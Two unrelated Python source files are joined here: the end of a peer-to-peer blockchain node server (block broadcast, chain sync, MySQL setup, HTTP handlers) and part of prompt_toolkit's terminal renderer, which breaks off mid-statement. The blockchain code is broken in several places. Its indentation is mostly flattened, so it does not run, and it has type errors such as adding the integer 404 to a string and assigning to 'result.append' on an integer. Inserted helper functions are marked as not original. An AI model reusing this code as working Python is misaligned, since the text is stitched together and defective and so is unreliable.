print("Block Information Incorrect #2 \n" + tempBlocks.__dict__)
return -1
print("new block good")
# validation
for i in range(0, len(heldBlock)):
if isSameBlock(heldBlock[i], bcToValidateForBlock[i]) == False:
print("Block Information Incorrect #1")
return -1
# [START] save it to csv
writeAllBlockchain(bcToValidateForBlock)
return 1
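# Small helper sketch (assumption, not in the original file): a readable summary of the
# return codes produced by compareMerge above, derived from its print statements.
def _compareMergeCodeText(code):
    meanings = {
        1: "remote chain accepted and written locally",
        2: "already updated (latest blocks identical)",
        3: "we have a better chain, keep the local data",
        -1: "block chain information incorrect",
        -2: "failed to read or merge the local chain",
    }
    return meanings.get(code, "unknown result")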
#Notifies servers in the list of servers that a new block has been created.
def broadcastNewBlock(block):
isSuccess = True
blockDictList = []
blockDictList.append(block.__dict__)
query = "serverList/get"
URL = DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "/" + query
try:
print("Trying to get serverList from " + DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "...........")
res = requests.get(URL)
if res.status_code == 200:
serverData = json.loads(res.text)
print("sent ok.")
else:
print(URL + " responding error " + 404)
isSuccess = False
except:
print("serverlist Server " + URL + " is not responding.")
isSuccess = False
if isSuccess :
        # Send the block via requests.post to /postBlock/validateBlock on every ip in SVR_LIST.
reqHeader = {'Content-Type': 'application/json; charset=utf-8'}
resDictData = {'validationResult': 'abnormal'}
try:
for i in serverData :
if IP_NUMBER == i['ip'] and str(PORT_NUMBER) == i['port']:
continue
else:
print("Trying to send blockchain data to " + i['ip'] + " : " + i['port'] + " in SVR_LIST...........")
URL = "http://" + i['ip'] + ":" + i['port'] + "/postBlock/validateBlock"
print("Trying to send : " + URL)
res = requests.post(URL, headers=reqHeader, data=json.dumps(blockDictList))
if res.status_code == 200:
print("sent ok.")
resDictData = json.loads(res.text)
print(resDictData)
else:
print("Failed to send blockchain data to " + i['ip'] + " : " + i['port'] + " in SVR_LIST >> not responding : 404")
isSuccess = False
except:
print("Failed to send blockchain data in SVR_LIST >> not responding")
isSuccess = False
        # If the response is 'abnormal', consider the mining of this block to have failed.
resultDict = resDictData.get('validationResult', 'abnormal')
print("current result : " + resultDict)
if resultDict == 'abnormal' :
print("Failed to broadcast new block")
isSuccess = False
        # If the response list is [] or 'normal', broadcasting succeeded and mining is complete.
else :
print("Succeed to broadcast new block")
return isSuccess
#Synchronize my block data with the block data of servers in the list of servers.
#The synchronization process is based on the results of comareMerge executed on the server
#from which the request was sent.
def syncBlockChain() :
print("Trying to sync blockchain data with SVR_LIST...........")
blockList, readSuccess = readBlockchain()
result = 0
lengthCount = 0
blockDictList = []
for block in blockList :
blockDictList.append(block.__dict__)
query = "serverList/get"
URL = DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "/" + query
try:
print("Trying to get serverList from " + DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "...........")
print(URL)
res = requests.get(URL)
if res.status_code == 200:
serverData = json.loads(res.text)
print("sent ok.")
else:
print(URL + " responding error " + 404)
result.append = -1
except:
print("serverlist Server " + URL + " is not responding.")
        result = -1
    if result == 0:
reqHeader = {'Content-Type': 'application/json; charset=utf-8'}
blockData = []
for i in serverData :
if IP_NUMBER == i['ip'] and str(PORT_NUMBER) == i['port']:
continue
else:
print("Trying to send blockchain data to " + i['ip'] + " : " + i['port'] + " in SVR_LIST...........")
URL = "http://" + i['ip'] + ":" + i['port'] + "/postBlock/sync"
try :
res = requests.post(URL, headers=reqHeader, data=json.dumps(blockDictList))
if res.status_code == 200:
print("sent ok.")
resData = json.loads(res.text)
if (resData[-1] == "we have a better chain"):
resData.pop()
if (len(resData) > lengthCount):
lengthCount = len(resData)
blockData = resData
elif (len(resData) == lengthCount):
for i in range(len(resData) - 1, 0, -1):
if float(resData[i]['timestamp']) < float(blockData[i]['timestamp']):
lengthCount = len(resData)
blockData = resData
if result == 3 or result == 0 :
result = 3
else:
resData = json.loads(res.text)
print("resData : " + str(resData[-1]))
if resData[-1] =="block chain info incorrect" :
result = -2
elif resData[-1] == "internal server error" :
result = -1
elif resData[-1] == "accepted" :
result = 1
else :
result = 2
else:
print("Failed to send blockchain data to " + i['ip'] + " : " + i['port']
+ " in SVR_LIST >> not responding : 404")
result = -1
except:
print("Failed to send blockchain data to in SVR_LIST >> not responding")
result = -1
if (len(blockData) > 0):
receivedBlock = []
for line in blockData:
block = Block(line['index'], line['previousHash'], line['timestamp'], line['data'],
line['currentHash'], \
line['proof'], line['merkleHash'])
receivedBlock.append(block)
writeAllBlockchain(receivedBlock)
if result == 3 or result == 0 :
result = 3
if result == 1 :
print("Succeed to sync blockchain")
return result
#Create blockchain and model list tables in the linked database and
#synchronize tables sequentially with servers in the list of servers for services.
def initSvr():
#Decide directly whether master or serve.
isMasterSvr = MASTER
if isMasterSvr :
print("server : MASTER mode")
else :
print("server : SERVE mode")
#create blockchain table and nodelist table.
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
password=DATABASE_SVR_PW, db=DATABASE_SVR_NAME, charset='utf8')
try:
sql = "CREATE TABLE " + DATABASE_BC_TABLE + "(" \
"idx int," \
"Hash varchar(255)," \
"timeStamp varchar(255)," \
"data longtext," \
"currentHash varchar(255)," \
"proof varchar(255)," \
"merkleHash varchar(255)" \
")"
with conn.cursor() as curs:
curs.execute(sql)
print("Success to create blockchain table " + DATABASE_BC_TABLE + " on " + DATABASE_SVR_NAME)
except:
print("Failed to create blockchain table " + DATABASE_BC_TABLE + " on " + DATABASE_SVR_NAME)
finally:
conn.close()
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
password=DATABASE_SVR_PW, \
db=DATABASE_SVR_NAME, charset='utf8')
try:
sql = "CREATE TABLE " + DATABASE_ND_TABLE + "(" \
"ip varchar(255)," \
"port varchar(255)," \
"tryConnect int" \
")"
with conn.cursor() as curs:
curs.execute(sql)
print("Success to create nodelist table " + DATABASE_ND_TABLE + " on " + DATABASE_SVR_NAME)
except:
print("Failed to create nodelist table " + DATABASE_ND_TABLE + " on " + DATABASE_SVR_NAME)
finally:
conn.close()
#Ask to insert your ip address and port number into the server that manages the list of miners.
serverData = []
query = "/serverList/add"
URL = DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + query
portDict = {"port" : PORT_NUMBER}
try:
print("Trying to add my ip and port to serverList : " + DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "...........")
res = requests.get(URL, params=portDict)
if res.status_code == 200:
serverData = json.loads(res.text)
print("sent ok.")
else:
print(URL + " responding error " + 404)
except:
print("serverlist Server " + URL + " is not responding.")
    if serverData and serverData[-1] == 'success' :
        print("Succeed registering my ip and port to serverlist database.")
    elif serverData and serverData[-1] == 'exist' :
        print("My ip and port already exist on serverlist database.")
    else :
        print("Failed registering my ip and port to serverlist database.")
#Synchronize the table of blockchain and the table of the nodelist sequentially with
#all servers in the server table of the server list server.
#The rule is that a server with the largest amount of data has highly reliable data.
if not isMasterSvr :
#blockchain table
myBlockCount = 0
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
password=DATABASE_SVR_PW, \
db=DATABASE_SVR_NAME, charset='utf8')
sql = "SELECT COUNT(*) FROM " + DATABASE_BC_TABLE
try:
with conn.cursor() as curs:
curs.execute(sql)
myBlockCount = curs.fetchone()
print("Success to get blockchain rowCount from my database, count >> " + str(myBlockCount[0]))
except:
print("Failed to get blockchain rowCount from my database >>" + DATABASE_SVR_IP + " : " + str(
DATABASE_SVR_PORT) + " : " + DATABASE_SVR_NAME)
finally:
conn.close()
query = "/serverList/get"
try:
print("Trying to get serverData from serverlist database...........")
URL = DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + query
print("Trying to send : " + URL)
res = requests.get(URL)
if res.status_code == 200:
print("sent ok.")
resServerDictData = json.loads(res.text)
print(str(resServerDictData))
else:
print("Failed to access serverlist >> not responding : 404")
except:
print("Failed to access serverlist >> not responding")
if myBlockCount[0] == 0:
maxBlockCount = 0
try:
blocklist = []
for i in resServerDictData:
if IP_NUMBER == i['ip'] and str(PORT_NUMBER) == i['port'] :
continue
else :
print("Trying to get blockchain data from table on " + i['ip'] + ":" + i['port'] + "...........")
URL = "http://" + i['ip'] + ":" + str(i['port']) + "/block/getBlockData"
res = requests.get(URL)
if res.status_code == 200:
print("Success to get blockchain data")
resBlockDictData = json.loads(res.text)
if resBlockDictData[-1] == "no data exists" :
resBlockDictData = []
if len(resBlockDictData) > maxBlockCount:
for line in resBlockDictData:
block = Block(line['index'], line['previousHash'], line['timestamp'], line['data'],
line['currentHash'],
line['proof'], line['merkleHash'])
blocklist.append(block)
writeAllBlockchain(blocklist)
maxBlockCount = len(blocklist)
else:
print("Failed to get blockchain data from " + i['ip'] + ":" + str(i['port']))
except:
print("Failed to access serverlist >> not responding")
else :
pass
#nodelist table
myNnodeCount = 0
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
password=DATABASE_SVR_PW, \
db=DATABASE_SVR_NAME, charset='utf8')
sql = "SELECT COUNT(*) FROM " + DATABASE_ND_TABLE
try:
with conn.cursor() as curs:
curs.execute(sql)
myNnodeCount = curs.fetchone()
print("Success to get node rowCount from my database, count >> " + str(myNnodeCount[0]))
except:
print("Failed to get nodelist from my database >> " + DATABASE_SVR_IP + " : " + str(DATABASE_SVR_PORT) + " : " + DATABASE_SVR_NAME)
finally:
conn.close()
if myNnodeCount[0] == 0 :
maxNodeCount = 0
try:
nodeList = []
for i in resServerDictData:
if IP_NUMBER == i['ip'] and str(PORT_NUMBER) == i['port'] :
continue
else :
print("Trying to get node data from table on " + i['ip'] + ":" + i['port'] + "...........")
URL = "http://" + i['ip'] + ":" + i['port'] + "/node/getNode"
res = requests.get(URL)
if res.status_code == 200:
print("Success to get node data")
resNodeDictData = json.loads(res.text)
for line in resNodeDictData:
node = Node(line[0], line[1], line[2])
nodeList.append(node)
if len(nodeList) >= maxNodeCount:
maxNodeCount = len(nodeList)
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT,
user=DATABASE_SVR_USER,
passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME, charset='utf8')
try:
for node in nodeList:
print("Trying to write node data on my database...........")
with conn.cursor() as curs:
sql = "INSERT INTO " + DATABASE_ND_TABLE + " VALUES (%s,%s,%s)"
curs.execute(sql, (node.ip, node.port, node.tryConnect))
conn.commit()
print("Success to write node data on my database")
except:
print("Failed to write node data on my database")
finally:
conn.close()
else:
print("Failed to get node data from " + i['ip'] + ":" + i['port'])
except:
print("Failed to access serverlist >> not responding")
else:
pass
print("initSvr setting Done.........")
return 1
# This class will handle any incoming request from
# a browser
class myHandler(BaseHTTPRequestHandler):
# def __init__(self, request, client_address, server):
# BaseHTTPRequestHandler.__init__(self, request, client_address, server)
# Handler for the GET requests
def do_GET(self):
data = [] # response json data
if None != re.search('/block/*', self.path):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
if None != re.search('/block/getBlockData', self.path):
blockList, readSuccess = readBlockchain()
if blockList == [] and readSuccess:
print("No Block Exists")
data.append("no data exists")
else:
for i in blockList:
print(i.__dict__)
data.append(i.__dict__)
self.wfile.write(bytes(json.dumps(data, sort_keys=True, indent=4), "utf-8"))
elif None != re.search('/block/generateBlock', self.path):
t = threading.Thread(target=mine)
t.start()
data.append("{mining is underway:check later by calling /block/getBlockData}")
self.wfile.write(bytes(json.dumps(data, sort_keys=True, indent=4), "utf-8"))
else:
data.append("{info:no such api}")
self.wfile.write(bytes(json.dumps(data, sort_keys=True, indent=4), "utf-8"))
elif None != re.search('/node/*', self.path):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
if None != re.search('/node/addNode', self.path):
queryDict =[{'ip' : self.client_address[0],'port':self.client_address[1]}]
res = addNode(queryDict, mode = 'new')
if res == 1:
importedNodes = readNodes()
data = importedNodes
print("node added okay")
elif res == 0:
data.append("caught exception while saving")
elif res == -1:
importedNodes = readNodes()
data = importedNodes
data.append("requested node is already exists")
self.wfile.write(bytes(json.dumps(data, sort_keys=True, indent=4), "utf-8"))
elif None != re.search('/node/getNode', self.path):
importedNodes = readNodes()
data = importedNodes
self.wfile.write(bytes(json.dumps(data, sort_keys=True, indent=4), "utf-8"))
else:
self.send_response(403)
self.send_header('Content-Type', 'application/json')
self.end_headers()
# ref : https://mafayyaz.wordpress.com/2013/02/08/writing-simple-http-server-in-python-with-rest-and-json/
def do_POST(self):
if None != re.search('/postBlock/*', self.path):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
if None != re.search('/postBlock/validateBlock', self.path):
ctype, pdict = cgi.parse_header(self.headers['content-type'])
# print(ctype) #print(pdict)
if ctype == 'application/json':
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
receivedData = post_data.decode('utf-8')
print(type(receivedData))
tempDictList = json.loads(receivedData) # load your str into a list #print(type(tempDict))
for tempDict in tempDictList :
newBlock = Block(tempDict['index'], tempDict['previousHash'], tempDict['timestamp'], tempDict['data'], tempDict['currentHash'], \
tempDict['proof'], tempDict['merkleHash'])
blockList, readSuccess = readBlockchain()
if len(blockList) > 0:
previousBlock = getLatestBlock(blockList)
if isValidNewBlock(newBlock, previousBlock) == True:
tempDict['validationResult'] = 'normal'
result = writeBlockchain(newBlock)
if result == 1 :
print("Succeed to insert new block on database.")
tempDict['validationResult'] = 'normal'
else :
print("Failed to insert new block on database.")
tempDict['validationResult'] = 'abnormal'
else:
tempDict['validationResult'] = 'abnormal'
else :
result = writeBlockchain(newBlock)
if result == 1:
print("Succeed to insert new block on database.")
tempDict['validationResult'] = 'normal'
else:
print("Failed to insert new block on database.")
tempDict['validationResult'] = 'abnormal'
self.wfile.write(bytes(json.dumps(tempDict), "utf-8"))
if None != re.search('/postBlock/sync', self.path):
ctype, pdict = cgi.parse_header(self.headers['content-type'])
if ctype == 'application/json':
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
receivedData = post_data.decode('utf-8')
tempDict = json.loads(receivedData) # load your str into a list
print(tempDict)
res = compareMerge(tempDict)
if res == -2: # internal error
tempDict.append("block chain info incorrect")
elif res == -1: # block chain info incorrect
tempDict.append("internal server error")
elif res == 1: # normal
tempDict.append("accepted")
elif res == 2: # identical
tempDict.append("already updated")
elif res == 3: # we have a longer chain
                        # On result 3, reset tempDict, fill it with our own block data and send it back.
blockList, isSuccess = readBlockchain()
tempDict = []
for line in blockList:
tempDict.append(line.__dict__)
tempDict.append("we have a better chain")
self.wfile.write(bytes(json.dumps(tempDict), "utf-8"))
elif None != re.search('/postNode/*', self.path):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
if None != re.search('/postNode/newSvr', self.path):
ctype, pdict = cgi.parse_header(self.headers['content-type'])
print("get response")
if ctype == 'application/json':
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
receivedData = post_data.decode('utf-8')
tempDict = json.loads(receivedData) # load your str into a list
if addNode(tempDict, mode='sync') == 1:
self.wfile.write(bytes(json.dumps(tempDict), "utf-8"))
else:
tempDict.append("error : cannot add node to sync")
self.wfile.write(bytes(json.dumps(tempDict), "utf-8"))
else:
self.send_response(404)
self.send_header('Content-Type', 'application/json')
self.end_headers()
return
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
try:
# Create a web server and define the handler to manage the
# incoming request
# server = HTTPServer(('', PORT_NUMBER), myHandler)
server = ThreadedHTTPServer(('', PORT_NUMBER), myHandler)
print('Started httpserver on port ', PORT_NUMBER)
initSvr()
# Wait forever for incoming http requests
server.serve_forever()
except (KeyboardInterrupt, Exception) as e:
print('^C received, shutting down the web server')
print(e)
server.socket.close()
|
renderer.py
|
"""
Renders the command line on the console.
(Redraws parts of the input line that were changed.)
"""
from __future__ import unicode_literals
from prompt_toolkit.eventloop import Future, From, ensure_future, get_event_loop
from prompt_toolkit.filters import to_filter
from prompt_toolkit.formatted_text import to_formatted_text
from prompt_toolkit.layout.mouse_handlers import MouseHandlers
from prompt_toolkit.layout.screen import Point, Screen, WritePosition
from prompt_toolkit.output import Output, ColorDepth
from prompt_toolkit.styles import BaseStyle, DummyStyleTransformation, StyleTransformation
from prompt_toolkit.utils import is_windows
from collections import deque
from six.moves import range
import time
import threading
__all__ = [
'Renderer',
'print_formatted_text',
]
def _output_screen_diff(app, output, screen, current_pos, color_depth,
previous_screen=None, last_style=None, is_done=False,
full_screen=False, attrs_for_style_string=None,
size=None, previous_width=0): # XXX: drop is_done
"""
Render the diff between this screen and the previous screen.
This takes two `Screen` instances. The one that represents the output like
it was during the last rendering and one that represents the current
output raster. Looking at these two `Screen` instances, this function will
render the difference by calling the appropriate methods of the `Output`
object that only paint the changes to the terminal.
This is some performance-critical code which is heavily optimized.
Don't change things without profiling first.
:param current_pos: Current cursor position.
:param last_style: The style string, used for drawing the last drawn
character. (Color/attributes.)
:param attrs_for_style_string: :class:`._StyleStringToAttrsCache` instance.
:param width: The width of the terminal.
:param previous_width: The width of the terminal during the last rendering.
"""
width, height = size.columns, size.rows
#: Remember the last printed character.
last_style = [last_style] # nonlocal
#: Variable for capturing the output.
write = output.write
write_raw = output.write_raw
# Create locals for the most used output methods.
# (Save expensive attribute lookups.)
_output_set_attributes = output.set_attributes
_output_reset_attributes = output.reset_attributes
_output_cursor_forward = output.cursor_forward
_output_cursor_up = output.cursor_up
_output_cursor_backward = output.cursor_backward
# Hide cursor before rendering. (Avoid flickering.)
output.hide_cursor()
def reset_attributes():
" Wrapper around Output.reset_attributes. "
_output_reset_attributes()
last_style[0] = None # Forget last char after resetting attributes.
def move_cursor(new):
" Move cursor to this `new` point. Returns the given Point. "
current_x, current_y = current_pos.x, current_pos.y
if new.y > current_y:
# Use newlines instead of CURSOR_DOWN, because this might add new lines.
# CURSOR_DOWN will never create new lines at the bottom.
# Also reset attributes, otherwise the newline could draw a
# background color.
reset_attributes()
write('\r\n' * (new.y - current_y))
current_x = 0
_output_cursor_forward(new.x)
return new
elif new.y < current_y:
_output_cursor_up(current_y - new.y)
if current_x >= width - 1:
write('\r')
_output_cursor_forward(new.x)
elif new.x < current_x or current_x >= width - 1:
_output_cursor_backward(current_x - new.x)
elif new.x > current_x:
_output_cursor_forward(new.x - current_x)
return new
def output_char(char):
"""
Write the output of this character.
"""
# If the last printed character has the same style, don't output the
# style again.
the_last_style = last_style[0] # Either `None` or a style string.
if the_last_style == char.style:
write(char.char)
else:
# Look up `Attr` for this style string. Only set attributes if different.
# (Two style strings can still have the same formatting.)
# Note that an empty style string can have formatting that needs to
# be applied, because of style transformations.
new_attrs = attrs_for_style_string[char.style]
if not the_last_style or new_attrs != attrs_for_style_string[the_last_style]:
_output_set_attributes(new_attrs, color_depth)
write(char.char)
last_style[0] = char.style
# Render for the first time: reset styling.
if not previous_screen:
reset_attributes()
    # Disable autowrap. (When entering the alternate screen, or anytime when
# we have a prompt. - In the case of a REPL, like IPython, people can have
# background threads, and it's hard for debugging if their output is not
# wrapped.)
if not previous_screen or not full_screen:
output.disable_autowrap()
# When the previous screen has a different size, redraw everything anyway.
# Also when we are done. (We might take up less rows, so clearing is important.)
if is_done or not previous_screen or previous_width != width: # XXX: also consider height??
current_pos = move_cursor(Point(x=0, y=0))
reset_attributes()
output.erase_down()
previous_screen = Screen()
# Get height of the screen.
# (height changes as we loop over data_buffer, so remember the current value.)
# (Also make sure to clip the height to the size of the output.)
current_height = min(screen.height, height)
# Loop over the rows.
row_count = min(max(screen.height, previous_screen.height), height)
c = 0 # Column counter.
for y in range(row_count):
new_row = screen.data_buffer[y]
previous_row = previous_screen.data_buffer[y]
zero_width_escapes_row = screen.zero_width_escapes[y]
new_max_line_len = min(width - 1, max(new_row.keys()) if new_row else 0)
previous_max_line_len = min(width - 1, max(previous_row.keys()) if previous_row else 0)
# Loop over the columns.
c = 0
while c < new_max_line_len + 1:
new_char = new_row[c]
old_char = previous_row[c]
char_width = (new_char.width or 1)
# When the old and new character at this position are different,
# draw the output. (Because of the performance, we don't call
# `Char.__ne__`, but inline the same expression.)
if new_char.char != old_char.char or new_char.style != old_char.style:
current_pos = move_cursor(Point(x=c, y=y))
# Send injected escape sequences to output.
if c in zero_width_escapes_row:
write_raw(zero_width_escapes_row[c])
output_char(new_char)
current_pos = Point(x=current_pos.x + char_width, y=current_pos.y)
c += char_width
# If the new line is shorter, trim it.
if previous_screen and new_max_line_len < previous_max_line_len:
current_pos = move_cursor(Point(x=new_max_line_len + 1, y=y))
reset_attributes()
output.erase_end_of_line()
# Correctly reserve vertical space as required by the layout.
# When this is a new screen (drawn for the first time), or for some reason
# higher than the previous one. Move the cursor once to the bottom of the
# output. That way, we're sure that the terminal scrolls up, even when the
# lower lines of the canvas just contain whitespace.
    # The most obvious reason that we actually want this behaviour is to avoid
# the artifact of the input scrolling when the completion menu is shown.
# (If the scrolling is actually wanted, the layout can still be build in a
# way to behave that way by setting a dynamic height.)
if current_height > previous_screen.height:
current_pos = move_cursor(Point(x=0, y=current_height - 1))
# Move cursor:
if is_done:
current_pos = move_cursor(Point(x=0, y=current_height))
output.erase_down()
else:
current_pos = move_cursor(
screen.get_cursor_position(app.layout.current_window))
if is_done or not full_screen:
output.enable_autowrap()
# Always reset the color attributes. This is important because a background
# thread could print data to stdout and we want that to be displayed in the
# default colors. (Also, if a background color has been set, many terminals
# give weird artifacts on resize events.)
reset_attributes()
if screen.show_cursor or is_done:
output.show_cursor()
return current_pos, last_style[0]
class HeightIsUnknownError(Exception):
" Information unavailable. Did not yet receive the CPR response. "
class _StyleStringToAttrsCache(dict):
"""
A cache structure that maps style strings to :class:`.Attr`.
(This is an important speed up.)
"""
def __init__(self, get_attrs_for_style_str, style_transformation):
assert callable(get_attrs_for_style_str)
assert isinstance(style_transformation, StyleTransformation)
self.get_attrs_for_style_str = get_attrs_for_style_str
self.style_transformation = style_transformation
def __missing__(self, style_str):
attrs = self.get_attrs_for_style_str(style_str)
attrs = self.style_transformation.transform_attrs(attrs)
self[style_str] = attrs
return attrs
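def _style_cache_demo():
    """
    Illustrative sketch (not part of prompt_toolkit): thanks to the ``__missing__``
    hook above, each style string is resolved and transformed only once, and later
    lookups are served straight from the dict. The example style is an assumption.
    """
    from prompt_toolkit.styles import Style
    style = Style.from_dict({'prompt': 'bold #ff0066'})
    cache = _StyleStringToAttrsCache(style.get_attrs_for_style_str,
                                     DummyStyleTransformation())
    return cache['class:prompt']  # computed on first access, cached afterwards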
class CPR_Support(object):
" Enum: whether or not CPR is supported. "
SUPPORTED = 'SUPPORTED'
NOT_SUPPORTED = 'NOT_SUPPORTED'
UNKNOWN = 'UNKNOWN'
class Renderer(object):
"""
Typical usage:
::
output = Vt100_Output.from_pty(sys.stdout)
r = Renderer(style, output)
r.render(app, layout=...)
"""
CPR_TIMEOUT = 2 # Time to wait until we consider CPR to be not supported.
def __init__(self, style, output, full_screen=False, mouse_support=False, cpr_not_supported_callback=None):
assert isinstance(style, BaseStyle)
assert isinstance(output, Output)
assert callable(cpr_not_supported_callback) or cpr_not_supported_callback is None
self.style = style
self.output = output
self.full_screen = full_screen
self.mouse_support = to_filter(mouse_support)
self.cpr_not_supported_callback = cpr_not_supported_callback
self._in_alternate_screen = False
self._mouse_support_enabled = False
self._bracketed_paste_enabled = False
# Future set when we are waiting for a CPR flag.
self._waiting_for_cpr_futures = deque()
self.cpr_support = CPR_Support.UNKNOWN
# Cache for the style.
self._attrs_for_style = None
self._last_style_hash = None
self._last_transformation_hash = None
self._last_color_depth = None
self.reset(_scroll=True)
def reset(self, _scroll=False, leave_alternate_screen=True):
# Reset position
self._cursor_pos = Point(x=0, y=0)
# Remember the last screen instance between renderers. This way,
# we can create a `diff` between two screens and only output the
# difference. It's also to remember the last height. (To show for
# instance a toolbar at the bottom position.)
self._last_screen = None
self._last_size = None
self._last_style = None
# Default MouseHandlers. (Just empty.)
self.mouse_handlers = MouseHandlers()
#: Space from the top of the layout, until the bottom of the terminal.
#: We don't know this until a `report_absolute_cursor_row` call.
self._min_available_height = 0
# In case of Windows, also make sure to scroll to the current cursor
# position. (Only when rendering the first time.)
if is_windows() and _scroll:
self.output.scroll_buffer_to_prompt()
# Quit alternate screen.
if self._in_alternate_screen and leave_alternate_screen:
self.output.quit_alternate_screen()
self._in_alternate_screen = False
# Disable mouse support.
if self._mouse_support_enabled:
self.output.disable_mouse_support()
self._mouse_support_enabled = False
# Disable bracketed paste.
if self._bracketed_paste_enabled:
self.output.disable_bracketed_paste()
self._bracketed_paste_enabled = False
# Flush output. `disable_mouse_support` needs to write to stdout.
self.output.flush()
@property
def last_rendered_screen(self):
"""
The `Screen` class that was generated during the last rendering.
This can be `None`.
"""
return self._last_screen
@property
def height_is_known(self):
"""
True when the height from the cursor until the bottom of the terminal
is known. (It's often nicer to draw bottom toolbars only if the height
is known, in order to avoid flickering when the CPR response arrives.)
"""
return self.full_screen or self._min_available_height > 0 or \
is_windows() # On Windows, we don't have to wait for a CPR.
@property
def rows_above_layout(self):
"""
Return the number of rows visible in the terminal above the layout.
"""
if self._in_alternate_screen:
return 0
elif self._min_available_height > 0:
total_rows = self.output.get_size().rows
last_screen_height = self._last_screen.height if self._last_screen else 0
return total_rows - max(self._min_available_height, last_screen_height)
else:
raise HeightIsUnknownError('Rows above layout is unknown.')
def request_absolute_cursor_position(self):
"""
Get current cursor position.
We do this to calculate the minimum available height that we can
        consume for rendering the prompt. This is the available space below the
cursor.
For vt100: Do CPR request. (answer will arrive later.)
For win32: Do API call. (Answer comes immediately.)
"""
# Only do this request when the cursor is at the top row. (after a
# clear or reset). We will rely on that in `report_absolute_cursor_row`.
assert self._cursor_pos.y == 0
# In full-screen mode, always use the total height as min-available-height.
if self.full_screen:
self._min_available_height = self.output.get_size().rows
# For Win32, we have an API call to get the number of rows below the
# cursor.
elif is_windows():
self._min_available_height = self.output.get_rows_below_cursor_position()
# Use CPR.
else:
if self.cpr_support == CPR_Support.NOT_SUPPORTED:
return
def do_cpr():
# Asks for a cursor position report (CPR).
self._waiting_for_cpr_futures.append(Future())
self.output.ask_for_cpr()
if self.cpr_support == CPR_Support.SUPPORTED:
do_cpr()
# If we don't know whether CPR is supported, only do a request if
# none is pending, and test it, using a timer.
elif self.cpr_support == CPR_Support.UNKNOWN and not self.waiting_for_cpr:
do_cpr()
def timer():
time.sleep(self.CPR_TIMEOUT)
# Not set in the meantime -> not supported.
if self.cpr_support == CPR_Support.UNKNOWN:
self.cpr_support = CPR_Support.NOT_SUPPORTED
if self.cpr_not_supported_callback:
# Make sure to call this callback in the main thread.
get_event_loop().call_from_executor(self.cpr_not_supported_callback)
t = threading.Thread(target=timer)
t.daemon = True
t.start()
def report_absolute_cursor_row(self, row):
"""
To be called when we know the absolute cursor position.
(As an answer of a "Cursor Position Request" response.)
"""
self.cpr_support = CPR_Support.SUPPORTED
# Calculate the amount of rows from the cursor position until the
# bottom of the terminal.
total_rows = self.output.get_size().rows
rows_below_cursor = total_rows - row + 1
# Set the minimum available height.
self._min_available_height = rows_below_cursor
# Pop and set waiting for CPR future.
try:
f = self._waiting_for_cpr_futures.popleft()
except IndexError:
pass # Received CPR response without having a CPR.
else:
f.set_result(None)
@property
def waiting_for_cpr(self):
"""
        Waiting for CPR flag. True when we send the request, but didn't get a
response.
"""
return bool(self._waiting_for_cpr_futures)
def wait_for_cpr_responses(self, timeout=1):
"""
Wait for a CPR response.
"""
cpr_futures = list(self._waiting_for_cpr_futures) # Make copy.
# When there are no CPRs in the queue. Don't do anything.
if not cpr_futures or self.cpr_support == CPR_Support.NOT_SUPPORTED:
return Future.succeed(None)
f = Future()
# When a CPR has been received, set the result.
def wait_for_responses():
for response_f in cpr_futures:
yield From(response_f)
if not f.done():
f.set_result(None)
ensure_future(wait_for_responses())
# Timeout.
def wait_for_timeout():
time.sleep(timeout)
# Got timeout.
if not f.done():
self._waiting_for_cpr_futures = deque()
f.set_result(None)
t = threading.Thread(target=wait_for_timeout)
t.daemon = True
t.start()
return f
def render(self, app, layout, is_done=False):
"""
Render the current interface to the output.
:param is_done: When True, put the cursor at the end of the interface. We
won't print any changes to this part.
"""
output = self.output
# Enter alternate screen.
if self.full_screen and not self._in_alternate_screen:
self._in_alternate_screen = True
output.enter_alternate_screen()
# Enable bracketed paste.
if not self._bracketed_paste_enabled:
self.output.enable_bracketed_paste()
self._bracketed_paste_enabled = True
# Enable/disable mouse support.
needs_mouse_support = self.mouse_support()
if needs_mouse_support and not self._mouse_support_enabled:
output.enable_mouse_support()
self._mouse_support_enabled = True
elif not needs_mouse_support and self._mouse_support_enabled:
output.disable_mouse_support()
self._mouse_support_enabled = False
# Create screen and write layout to it.
size = output.get_size()
screen = Screen()
screen.show_cursor = False # Hide cursor by default, unless one of the
# containers decides to display it.
mouse_handlers = MouseHandlers()
# Calculate height.
if self.full_screen:
height = size.rows
elif is_done:
            # When we are done, we don't necessarily want to fill up until the bottom.
height = layout.container.preferred_height(size.columns, size.rows).preferred
else:
last_height = self._last_screen.height if self._last_screen else 0
height = max(self._min_available_height,
last_height,
layout.container.preferred_height(size.columns, size.rows).preferred)
height = min(height, size.rows)
        # When the size changes, don't consider the previous screen.
if self._last_size != size:
self._last_screen = None
# When we render using another style or another color depth, do a full
# repaint. (Forget about the previous rendered screen.)
# (But note that we still use _last_screen to calculate the height.)
if (self.style.invalidation_hash() != self._last_style_hash or
